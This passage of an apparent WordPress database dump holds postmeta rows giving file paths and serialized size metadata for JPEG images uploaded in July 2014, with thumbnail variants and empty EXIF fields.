mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"091-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"091-1-768x600.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"091-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:18:\"091-1-1024x500.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:17:\"091-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:17:\"091-1-880x688.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:688;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:17:\"091-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:17:\"091-1-450x352.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:352;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:17:\"091-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1055,1943,'_wp_attached_file','2014/07/101-1.jpg'),(1056,1943,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:653;s:6:\"height\";i:576;s:4:\"file\";s:17:\"2014/07/101-1.jpg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"101-1-300x265.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"101-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"101-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:17:\"101-1-653x500.jpg\";s:5:\"width\";i:653;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:17:\"101-1-653x380.jpg\";s:5:\"width\";i:653;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:17:\"101-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:17:\"101-1-450x397.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:397;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:17:\"101-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1057,1944,'_wp_attached_file','2014/07/111-1.jpg'),(1058,1944,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:667;s:6:\"height\";i:458;s:4:\"file\";s:17:\"2014/07/111-1.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"111-1-300x206.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:206;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"111-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"111-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:17:\"111-1-667x380.jpg\";s:5:\"width\";i:667;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:17:\"111-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:17:\"111-1-450x309.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:309;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:17:\"111-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1059,1945,'_wp_attached_file','2014/07/121-1.jpg'),(1060,1945,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1600;s:6:\"height\";i:1210;s:4:\"file\";s:17:\"2014/07/121-1.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"121-1-300x227.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:227;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:18:\"121-1-1024x774.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:774;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"121-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"121-1-768x581.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:581;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:19:\"121-1-1536x1162.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1162;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"121-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:18:\"121-1-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:17:\"121-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:17:\"121-1-880x666.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:666;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:17:\"121-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:17:\"121-1-450x340.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:340;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:17:\"121-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1061,1946,'_wp_attached_file','2014/07/131-1.jpg'),(1062,1946,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:639;s:6:\"height\";i:405;s:4:\"file\";s:17:\"2014/07/131-1.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"131-1-300x190.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:190;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"131-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"131-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:17:\"131-1-639x380.jpg\";s:5:\"width\";i:639;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:17:\"131-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:17:\"131-1-450x285.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:17:\"131-1-450x405.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:405;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1063,1947,'_wp_attached_file','2014/07/141-1.jpg'),(1064,1947,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:900;s:6:\"height\";i:642;s:4:\"file\";s:17:\"2014/07/141-1.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"141-1-300x214.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:214;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"141-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"141-1-768x548.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:548;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"141-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:17:\"141-1-900x500.jpg\";s:5:\"width\";i:900;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:17:\"141-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:17:\"141-1-880x628.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:628;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:17:\"141-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:17:\"141-1-450x321.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:321;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:17:\"141-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1065,1948,'_wp_attached_file','2014/07/151-1.jpg'),(1066,1948,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:900;s:6:\"height\";i:684;s:4:\"file\";s:17:\"2014/07/151-1.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"151-1-300x228.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:228;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"151-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"151-1-768x584.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:584;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"151-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:17:\"151-1-900x500.jpg\";s:5:\"width\";i:900;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:17:\"151-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:17:\"151-1-880x669.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:669;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:17:\"151-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:17:\"151-1-450x342.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:342;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:17:\"151-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1067,1949,'_wp_attached_file','2014/07/i11-1.jpg'),(1068,1949,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:799;s:4:\"file\";s:17:\"2014/07/i11-1.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"i11-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"i11-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"i11-1-768x614.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:614;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"i11-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:18:\"i11-1-1000x500.jpg\";s:5:\"width\";i:1000;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:17:\"i11-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:17:\"i11-1-880x703.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:703;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:17:\"i11-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:17:\"i11-1-450x360.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:17:\"i11-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1069,1950,'_wp_attached_file','2014/07/i21-1.jpg'),(1070,1950,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:610;s:4:\"file\";s:17:\"2014/07/i21-1.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"i21-1-300x183.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:183;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"i21-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"i21-1-768x468.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:468;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"i21-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:18:\"i21-1-1000x500.jpg\";s:5:\"width\";i:1000;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:17:\"i21-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:17:\"i21-1-880x537.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:537;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:17:\"i21-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:17:\"i21-1-450x275.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:275;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:17:\"i21-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1071,1951,'_wp_attached_file','2014/07/i31-1.jpg'),(1072,1951,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:999;s:6:\"height\";i:609;s:4:\"file\";s:17:\"2014/07/i31-1.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"i31-1-300x183.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:183;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"i31-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"i31-1-768x468.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:468;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"i31-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:17:\"i31-1-999x500.jpg\";s:5:\"width\";i:999;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:17:\"i31-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:17:\"i31-1-880x536.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:17:\"i31-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:17:\"i31-1-450x274.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:274;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:17:\"i31-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1073,1952,'_wp_attached_file','2014/07/i41-1.jpg'),(1074,1952,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:638;s:4:\"file\";s:17:\"2014/07/i41-1.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"i41-1-300x191.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"i41-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"i41-1-768x490.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:490;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"i41-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:18:\"i41-1-1000x500.jpg\";s:5:\"width\";i:1000;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:17:\"i41-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:17:\"i41-1-880x561.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:561;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:17:\"i41-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:17:\"i41-1-450x287.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:287;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:17:\"i41-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1075,1953,'_wp_attached_file','2014/07/i51-1.jpg'),(1076,1953,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:549;s:4:\"file\";s:17:\"2014/07/i51-1.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"i51-1-300x165.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:165;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"i51-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"i51-1-768x422.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:422;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"i51-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:18:\"i51-1-1000x500.jpg\";s:5: